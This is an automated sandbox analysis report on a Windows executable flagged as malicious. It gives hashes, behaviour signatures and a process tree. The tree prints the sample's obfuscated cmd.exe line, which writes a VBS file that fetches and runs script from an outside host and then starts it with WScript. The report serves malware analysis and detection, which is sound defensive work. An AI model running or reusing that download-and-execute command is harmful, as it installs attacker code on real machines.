Analysis

  • max time kernel
    45s
  • max time network
    110s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    07-04-2023 00:44

General

  • Target

    FACT_D755N50T2.exe

  • Size

    1.5MB

  • MD5

    35e24a8ce72dd5360fc826947abfdc10

  • SHA1

    929e014f9d6271ae3ce82d5dadcd674631c9c779

  • SHA256

    d0fbbba4a32cf5156daf563e6fa9b2133cc11b85a7a2632411eb7195ab35e9c7

  • SHA512

    558bc4ac4c9da60fea107037789cfa7cb0cbe10829687bf50f71afb0cfa51bc74f5d5f478c59914e8e55f5b6bd4d9e487a3b1286327491189aa5e90f0c38cf4e

  • SSDEEP

    24576:Z6Ykri0w6Hf0PjnVlYI5YALlgKPlDQKimQn+IZQaL89V6pZE1rrrrrrrrrrrrrrl:pKw6/0zVlYIqXKNKmGZXgZpO8

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe
    "C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>%Public%\re9.vBs&&%ComSpec% /c start %Public%\re9.vBs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>C:\Users\Public\re9.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\re9.vBs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1268
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c start C:\Users\Public\re9.vBs
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1596
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Public\re9.vBs"
            5⤵
            • Blocklisted process makes network request
            • Modifies system certificate store
            PID:1260

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    61KB

    MD5

    e71c8443ae0bc2e282c73faead0a6dd3

    SHA1

    0c110c1b01e68edfacaeae64781a37b1995fa94b

    SHA256

    95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

    SHA512

    b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b5a29bbf68b8f41b46ac65fd613e2d94

    SHA1

    9e9dbc02342be6449d13e33da2f2e3be660e5395

    SHA256

    a5366370f8836b722ad2c7a65c4d302e1ffdf406787e33903c590584ba1896ff

    SHA512

    2a966de6003aa12ddd983b3113f55eb0e15e9857d66550b1c45ae46b405598c8bc73ef9f7a294fced988cf3e4366bd9fc6f6cd02a9ffc8ace113b7be42cb84f8

  • C:\Users\Admin\AppData\Local\Temp\Cab7755.tmp

    Filesize

    61KB

    MD5

    fc4666cbca561e864e7fdf883a9e6661

    SHA1

    2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

    SHA256

    10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

    SHA512

    c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

  • C:\Users\Admin\AppData\Local\Temp\Tar7BBF.tmp

    Filesize

    161KB

    MD5

    be2bec6e8c5653136d3e72fe53c98aa3

    SHA1

    a8182d6db17c14671c3d5766c72e58d87c0810de

    SHA256

    1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd

    SHA512

    0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

  • C:\Users\Public\re9.vBs

    Filesize

    107B

    MD5

    e7a1b7f622c413b656bd350365edaef2

    SHA1

    e769ca533dd368bb6d341e7a57c002dc6e07a289

    SHA256

    c0fd93d1266613402380c5f3888fe5df73103d25b6d4c848252221b06a749dbb

    SHA512

    b0b3871ced3eae994d050746610dc67bb02b6a8454c6fa826aec8cfdd3a0d8fe21c5e9fe44667f2c5ca85f80712006ff3fe9f08bb2694ae2a0d857e344afb861

  • memory/1504-69-0x00000000000D0000-0x000000000025C000-memory.dmp

    Filesize

    1.5MB